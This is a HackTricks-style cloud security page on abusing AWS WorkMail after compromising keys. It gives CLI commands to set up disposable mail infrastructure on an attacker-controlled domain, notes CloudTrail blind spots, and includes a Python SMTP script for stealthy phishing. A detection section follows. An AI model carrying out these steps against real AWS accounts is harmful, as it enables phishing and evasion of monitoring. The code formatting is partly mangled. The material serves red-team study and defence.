AWS - WorkMail Post Exploitation

Tip

Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoie o HackTricks

Check the subscription plans!

Participe do 💬 Discord group ou do telegram group ou siga-nos no Twitter 🐦 @hacktricks_live.

Compartilhe hacking tricks enviando PRs para os HackTricks e HackTricks Cloud github repos.

Abusando do WorkMail para contornar o SES sandbox

Mesmo que o SES esteja preso no sandbox (apenas recipients verificados, ~200 msgs/24h, 1 msg/s), o WorkMail não possui restrição equivalente. Um atacante com long-term keys pode criar infraestrutura de e-mail descartável e começar a enviar imediatamente:

Create a WorkMail org (region-scoped)

aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>

Verify attacker-controlled domains (WorkMail invokes SES APIs as workmail.amazonaws.com):

aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com

Provision mailbox users and register them:

aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com

Notas:

Cap padrão de recipient documentado pela AWS: 100,000 external recipients/day per org (agregado entre usuários).
A atividade de verificação de domínio aparecerá no CloudTrail sob SES mas com invokedBy: workmail.<region>.amazonaws.com, então eventos de verificação do SES podem pertencer à configuração do WorkMail em vez de campanhas SES.
WorkMail mailbox users become application-layer persistence independent from IAM users.

Sending paths & telemetry gaps

Cliente web (WorkMail UI)

Envia como eventos ses:SendRawEmail no CloudTrail.
userIdentity.type = AWSService, invokedBy/sourceIPAddress/userAgent = workmail.<region>.amazonaws.com, então o IP real do cliente fica oculto.
Os requestParameters ainda leak o remetente (source, fromArn, sourceArn, configuration set) para correlacionar com domínios/caixas de correio recém verificados.

SMTP (mais furtivo)

Endpoint: smtp.mail.<region>.awsapps.com:465 (SMTP over SSL) com a mailbox password.
No CloudTrail data events are generated for SMTP delivery, even when SES data events are enabled.
Pontos ideais de detecção são provisionamento de org/domínio/usuário e SES identity ARNs referenciados em eventos SendRawEmail enviados pela web subsequentes.

Exemplo de envio SMTP via WorkMail

```python import smtplib from email.message import EmailMessage

SMTP_SERVER = “smtp.mail.us-east-1.awsapps.com” SMTP_PORT = 465 EMAIL_ADDRESS = “marketing@attacker-domain.com” EMAIL_PASSWORD = “SuperSecretPassword!”

target = “victim@example.com” # can be unverified/external msg = EmailMessage() msg[“Subject”] = “WorkMail SMTP” msg[“From”] = EMAIL_ADDRESS msg[“To”] = target msg.set_content(“Delivered via WorkMail SMTP”)

with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp: smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD) smtp.send_message(msg)

</details>

## Considerações de detecção

- Se o WorkMail for desnecessário, bloqueie-o via **SCPs** (`workmail:*` deny) no nível da organização.
- Alertar sobre provisionamento: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail` e verificações do SES com `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Fique atento a eventos anômalos **`ses:SendRawEmail`** onde os ARNs de identidade referenciam domínios novos e o IP/UA de origem é igual a `workmail.<region>.amazonaws.com`.

## References

- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)

> [!TIP]
> Aprenda e pratique AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Apoie o HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Participe do** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) ou do [**telegram group**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Compartilhe hacking tricks enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>